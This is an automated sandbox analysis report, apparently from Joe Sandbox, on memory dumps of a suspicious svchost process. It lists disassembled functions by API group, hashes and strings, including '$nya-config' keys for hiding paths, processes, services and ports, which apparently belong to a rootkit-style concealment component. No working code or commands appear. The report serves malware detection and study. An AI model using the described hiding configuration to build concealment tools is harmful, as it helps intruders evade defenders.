                                                   • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                  • String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                  • API String ID: 2135414181-3572789727
                                                  • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                  • Instruction ID: 166e6a7cf8ca6ae22d1d2167cc4d7dbb97e4619db1cdf95cc15371901a208e22
                                                  • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                  • Instruction Fuzzy Hash: 0F71302AB10E50A6EB90AFE5E9A865A2374FB49B88F402531DF4D4372ADF79C464C340

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                   • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmp
                                                   • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                  • String ID: d
                                                  • API String ID: 2005889112-2564639436
                                                  • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                  • Instruction ID: 5fd594a0b7fa2e6d6a870a4b8be9315c5f609ef8c5858b0e1febb8391929093b
                                                  • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                  • Instruction Fuzzy Hash: 99515A36A00B84A6EBA4EFA2E66835A77B1F78CB88F448134DB4947719DF7CC459C700

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                   • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmp
                                                   • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                                  • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                                  • API String ID: 740688525-1880043860
                                                  • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                  • Instruction ID: 667aa4a931bf1db41e538e731fbbbe72ea80eb3c72d69248ee73dd534c18d3f0
                                                  • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                  • Instruction Fuzzy Hash: 59519029F0160461FA98AF96EA687A73270AB49BB0F584B349F3D473D2DBBCC445C740

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                   • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmp
                                                   • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                  • String ID: \GPU Engine(*)\Running Time
                                                  • API String ID: 1943346504-1805530042
                                                  • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                  • Instruction ID: 54bb57bfbac15d22c730a9ae4bf4d5dcc13813a5c375ca13860c46240ad27539
                                                  • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                  • Instruction Fuzzy Hash: 6631B326E04A40AAFBA5EF92EA1835BA3B0F78CBC5F4445349F4943626DFBCC555C340

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                   • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmp
                                                   • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                  • String ID: \GPU Engine(*)\Utilization Percentage
                                                  • API String ID: 1943346504-3507739905
                                                  • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                  • Instruction ID: 65eec3c7316b9ca877189915c2b978696c90943607defc846abed2c99c45d4dd
                                                  • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                  • Instruction Fuzzy Hash: B6319129E14B01AAF794EF92EA68B1A63B0F788F84F0455359F4E43726DFB8C845C300
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000003.1646195511.0000022F4B8F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022F4B8F0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_3_22f4b8f0000_svchost.jbxd
                                                  Similarity
                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 849930591-393685449
                                                  • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                  • Instruction ID: 350ed3b2226708ae4edfa82662d5c9b4d7a5033190cc26238961e0a1e2b44f09
                                                  • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                  • Instruction Fuzzy Hash: AED1AF3AA00744A6EBA0EFA5D58879E77B0F755799F100135EF8957B9BEB74C082C700

                                                   Control-flow Graph
                                                   • Rendered graph not reproduced; recoverable data from the node list: function 22f4b92a22c (basic blocks 22f4b92a22c-22f4b92a6fb), executed/not-executed colouring lost
                                                   • No direct API calls on the graph
                                                   • Internal calls: 22f4b928070, 22f4b928f84, 22f4b929178, 22f4b929324, 22f4b9295a4, 22f4b929634, 22f4b929704, 22f4b929838, 22f4b9299cc, 22f4b9299e0, 22f4b929a0c, 22f4b92a158, 22f4b92a6fc, 22f4b92a96c, 22f4b92ad28, 22f4b92b144, 22f4b92b1dc, 22f4b92b2cc, 22f4b92c2f4, 22f4b92c388
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                   • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmp
                                                   • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 849930591-393685449
                                                  • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                  • Instruction ID: 83a760fde54ee1c5f207a7528977c86193a96b1b5316f8e0d94e5d4ef025fc8b
                                                  • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                  • Instruction Fuzzy Hash: 85D18D2AD007409AFBA8AFA5E65839E77B0F755798F100935DB8957797CB78C481C700

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                   • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmp
                                                   • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                  • String ID: \\.\pipe\$nya-childproc
                                                  • API String ID: 166002920-3933612297
                                                  • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                  • Instruction ID: 56fa6b07a625ae531577085f785817776d22235ed9cb5571334ba84ca8f443b3
                                                  • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                  • Instruction Fuzzy Hash: 2D116A3AA18B4092E7909F61F62831A7770F38DB94F945230EB9902AA9CFBDC144CB40
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000003.1646195511.0000022F4B8F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022F4B8F0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_3_22f4b8f0000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                  • String ID:
                                                  • API String ID: 190073905-0
                                                  • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                  • Instruction ID: bd218116f59a5c56efc38000c5aded2ca847f2db8270a2ecf24cb78a0c5da713
                                                  • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                  • Instruction Fuzzy Hash: CC81A23CE00241B6FAD4BFE9DA59B5B32B1AB86782F5440359B0947397FAB8C957C700

                                                  Control-flow Graph

                                                  • Control-flow graph for the function at 22f4b927c50 (basic-block edge list with executed and not-executed blocks distinguished; rendered graph not reproduced in this text export)
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                  • String ID:
                                                  • API String ID: 190073905-0
                                                  • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                  • Instruction ID: 6da2365d5e17544b82aac065803e710dae94bd682bc38aef71eae997fec83743
                                                  • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                  • Instruction Fuzzy Hash: 4681E528E05640B6FAD8BFE5D6B93AB62B1AB85780F5488349B4857397DBFCCC45C310
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(?,?,?,0000022F4B929C6B,?,?,?,0000022F4B92945C,?,?,?,?,0000022F4B928F65), ref: 0000022F4B929B31
                                                  • GetLastError.KERNEL32(?,?,?,0000022F4B929C6B,?,?,?,0000022F4B92945C,?,?,?,?,0000022F4B928F65), ref: 0000022F4B929B3F
                                                  • LoadLibraryExW.KERNEL32(?,?,?,0000022F4B929C6B,?,?,?,0000022F4B92945C,?,?,?,?,0000022F4B928F65), ref: 0000022F4B929B69
                                                  • FreeLibrary.KERNEL32(?,?,?,0000022F4B929C6B,?,?,?,0000022F4B92945C,?,?,?,?,0000022F4B928F65), ref: 0000022F4B929BD7
                                                  • GetProcAddress.KERNEL32(?,?,?,0000022F4B929C6B,?,?,?,0000022F4B92945C,?,?,?,?,0000022F4B928F65), ref: 0000022F4B929BE3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                  • String ID: api-ms-
                                                  • API String ID: 2559590344-2084034818
                                                  • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                  • Instruction ID: ec79bae74621d3473f9289de3cbe0439ae45c8112a6144b4fb78fd3ca3ac7a4a
                                                  • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                  • Instruction Fuzzy Hash: C3310A2DE12640A1FE99BFA6E6287A723B4BB59B60F590938DE1D47792DF7CC044C300
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                  • String ID: CONOUT$
                                                  • API String ID: 3230265001-3130406586
                                                  • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                  • Instruction ID: d7620b8c19884500c47e3124fb66e9135124c8218baa58d1833e4fac0ed32348
                                                  • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                  • Instruction Fuzzy Hash: F1118129A14A4092E7D0AF92EA6C71A67B0F38CBE4F405234EB5D87B96CFB9C404C740
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Thread$Current$Context
                                                  • String ID:
                                                  • API String ID: 1666949209-0
                                                  • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                                  • Instruction ID: 54a9b70a4ef810b0383967a9bfaf94ee71e1065358e960c329d1809482fffa67
                                                  • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                                  • Instruction Fuzzy Hash: 1ED18D3AA08B4891EAB49F5AE5A435A77B0F388B84F100535EBCD47B66DF7CC551CB00
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Free$CurrentThread
                                                  • String ID:
                                                  • API String ID: 564911740-0
                                                  • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                  • Instruction ID: e4614e4e50a161e2bb6536ae214093138366ffb694989e2a8f17203713cc93de
                                                  • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                  • Instruction Fuzzy Hash: F451B328E01B55B5FE8DBFA5EA782A637B1BB04745F804C35962C067A7EFB8C564C340
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree
                                                  • String ID: $nya-
                                                  • API String ID: 756756679-1266920357
                                                  • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                  • Instruction ID: f6368292fef801f456ef4d047ad2896ab5c4a3f22002196d8df88fadc90d907f
                                                  • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                  • Instruction Fuzzy Hash: C8319529F05B55A6F698EF96D76932A63B4FB44B84F0848308F4807B56EFB8C461C700
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$Value$FreeHeap
                                                  • String ID:
                                                  • API String ID: 365477584-0
                                                  • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                  • Instruction ID: 5caee82ebc5799ff4bab53cc8ea9f8870476772665104bd938d6c37ff24bf77e
                                                  • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                  • Instruction Fuzzy Hash: 88112E2DE1524072F6DC7FB1E63E36B22719F89790F545A34AA66563D7CEACC441C300
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                  • String ID:
                                                  • API String ID: 517849248-0
                                                  • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                  • Instruction ID: 0a567cbdcd35ce77fb9ef5d2f757b24a0b632dea675aeb3ca454db5b1b0a9327
                                                  • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                  • Instruction Fuzzy Hash: E8015B29B00A4092FA94EF92E9A835A63B1FB8CFC0F4840349F8D43755DEBDC995C780
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                  • String ID:
                                                  • API String ID: 449555515-0
                                                  • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                  • Instruction ID: c7e426ad3a8663a85c993172cbf675b4bc21cb55f235fc4e2dcdafeb815fee9c
                                                  • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                  • Instruction Fuzzy Hash: A8012D69A1574096FBA8AFA2E9AC71777B1BB4DB45F040434CB4D06366EF7EC458C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: FinalHandleNamePathlstrlen
                                                  • String ID: \\?\
                                                  • API String ID: 2719912262-4282027825
                                                  • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                  • Instruction ID: c7868ee6e994c88c368ac7911b9c882d734e1b19883b4664ddc12e81d6a56a24
                                                  • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                  • Instruction Fuzzy Hash: 7CF0A42AB04685A2F7A0AFA0F6A835A6371F74CB88F845031DB4942559DFADC668C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: CombinePath
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3422762182-91387939
                                                  • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                  • Instruction ID: b8b2264c96036f2fd40b0f46cf7ae1827fe0674ee32b204284edde0178c0ef05
                                                  • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
